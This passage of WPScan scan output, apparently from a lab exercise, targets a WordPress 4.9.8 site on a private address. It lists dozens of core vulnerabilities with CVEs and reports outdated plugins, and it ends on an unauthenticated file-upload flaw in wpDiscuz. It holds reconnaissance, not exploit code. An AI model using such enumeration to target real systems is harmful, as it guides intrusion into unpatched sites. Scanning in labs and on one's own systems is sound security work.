 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.95.10/assets/fonts/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.95.10/assets/fonts/blog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.95.10/assets/fonts/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'WordPress 4.9.8'
 |
 | [!] 60 vulnerabilities identified:
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/e3ef8976-11cb-4854-837f-786f43cbdf44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/999dba5a-82fb-4717-89c3-6ed723cc7e45
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/046ff6a0-90b2-4251-98fc-b7fba93f8334
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/3182002e-d831-4412-a27d-a5e39bb44314
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/7f7a0795-4dd7-417d-804e-54f12595d1e4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/65f1aec4-6d28-4396-88d7-66702b21c7a2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/d741f5ae-52ca-417d-a2ca-acdfb7ca5808
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/1a693e57-f99c-4df6-93dd-0cdc92fd0526
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |      - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.9.10
 |     References:
 |      - https://wpscan.com/vulnerability/d150f43f-6030-4191-98b8-20ae05585936
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
 |
 | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
 |     Fixed in: 4.9.11
 |     References:
 |      - https://wpscan.com/vulnerability/4494a903-5a73-4cad-8c14-1e7b4da2be61
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
 |      - https://hackerone.com/reports/339483
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/d39a7b84-28b9-4916-a2fc-6192ceb6fa56
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/d005b1f8-749d-438a-8818-21fba45c6465
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/7804d8ed-457a-407e-83a7-345d3bbe07b2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation 
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/26a26de2-d598-405d-b00c-61f71cfacff6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/715c00e3-5302-44ad-b914-131c162c3f71
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
 |     Fixed in: 4.9.13
 |     References:
 |      - https://wpscan.com/vulnerability/4a6de154-5fbd-4c80-acd3-8902ee431bd8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
 |     Fixed in: 4.9.13
 |     References:
 |      - https://wpscan.com/vulnerability/23553517-34e3-40a9-a406-f3ffbe9dd265
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://hackerone.com/reports/509930
 |      - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
 |     Fixed in: 4.9.13
 |     References:
 |      - https://wpscan.com/vulnerability/be794159-4486-4ae1-a5cc-5c190e5ddf5f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
 |
 | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
 |     Fixed in: 4.9.13
 |     References:
 |      - https://wpscan.com/vulnerability/8fac612b-95d2-477a-a7d6-e5ec0bb9ca52
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
 |
 | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/7db191c0-d112-4f08-a419-a1cd81928c4e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47634/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
 |
 | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/d1e1ba25-98c9-4ae7-8027-9632fb825a56
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47635/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/4eee26bd-a27e-4509-a3a5-8019dd48e429
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47633/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
 |
 | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/e721d8b9-a38f-44ac-8520-b4a9ed6a5157
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47637/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/55438b63-5fc9-4812-afc4-2f1eff800d5f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47638/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2
 |      - https://hackerone.com/reports/179695
 |
 | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
 |     Fixed in: 4.9.17
 |     References:
 |      - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450
 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq
 |      - https://core.trac.wordpress.org/changeset/50717/
 |      - https://www.youtube.com/watch?v=J2GXmxAdNWs
 |
 | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
 |     Fixed in: 4.9.18
 |     References:
 |      - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
 |      - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
 |      - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
 |      - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
 |      - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
 |      - https://www.youtube.com/watch?v=HaW15aMzBUM
 |
 | [!] Title: WordPress < 5.8 - Plugin Confusion
 |     Fixed in: 5.8
 |     References:
 |      - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223
 |      - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/
 |
 | [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
 |     Fixed in: 4.9.19
 |     References:
 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
 |      - https://hackerone.com/reports/1378209
 |
 | [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
 |     Fixed in: 4.9.19
 |     References:
 |      - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w
 |      - https://hackerone.com/reports/425342
 |      - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
 |
 | [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
 |     Fixed in: 4.9.19
 |     References:
 |      - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86
 |
 | [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
 |     Fixed in: 4.9.19
 |     References:
 |      - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h
 |      - https://hackerone.com/reports/541469
 |
 | [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
 |     Fixed in: 4.9.20
 |     References:
 |      - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting
 |     Fixed in: 4.9.21
 |     References:
 |      - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting
 |     Fixed in: 4.9.21
 |     References:
 |      - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - SQLi via Link API
 |     Fixed in: 4.9.21
 |     References:
 |      - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283
 |
 | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095
 |
 | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44
 |
 | [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc
 |
 | [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via the Customizer
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955
 |
 | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8
 |
 | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492
 |
 | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e
 |
 | [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg
 |     Fixed in: 4.9.22
 |     References:
 |      - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/gutenberg/pull/45045/files
 |
 | [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding
 |     References:
 |      - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590
 |      - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
 |
 | [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files
 |     Fixed in: 4.9.23
 |     References:
 |      - https://wpscan.com/vulnerability/2999613a-b8c8-4ec0-9164-5dfe63adf6e6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2745
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF
 |     Fixed in: 4.9.23
 |     References:
 |      - https://wpscan.com/vulnerability/a03d744a-9839-4167-a356-3e7da0f1d532
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery
 |     Fixed in: 4.9.23
 |     References:
 |      - https://wpscan.com/vulnerability/3b574451-2852-4789-bc19-d5cc39948db5
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data
 |     Fixed in: 4.9.23
 |     References:
 |      - https://wpscan.com/vulnerability/ef289d46-ea83-4fa5-b003-0352c690fd89
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/
 |
 | [!] Title: WP < 6.2.1 - Contributor+ Content Injection
 |     Fixed in: 4.9.23
 |     References:
 |      - https://wpscan.com/vulnerability/1527ebdb-18bc-4f9d-9c20-8d729a628670
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
 |     Fixed in: 4.9.24
 |     References:
 |      - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
 |     Fixed in: 4.9.24
 |     References:
 |      - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
 |     Fixed in: 4.9.24
 |     References:
 |      - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
 |     Fixed in: 4.9.24
 |     References:
 |      - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
 |      - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
 |     Fixed in: 4.9.25
 |     References:
 |      - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
 |     Fixed in: 4.9.25
 |     References:
 |      - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:10:07 <=========================================> (105357 / 105357) 100.00% Time: 00:10:07
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/
 | Last Updated: 2024-03-21T00:55:00.000Z
 | Readme: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.2
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.8 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt

[+] wpdiscuz
 | Location: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/
 | Last Updated: 2024-05-08T07:02:00.000Z
 | Readme: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt
 | [!] The version is out of date, the latest version is 7.6.19
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/, status: 200
 |
 | [!] 16 vulnerabilities identified:
 |
 | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
 |     Fixed in: 7.0.5
 |     References:
 |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
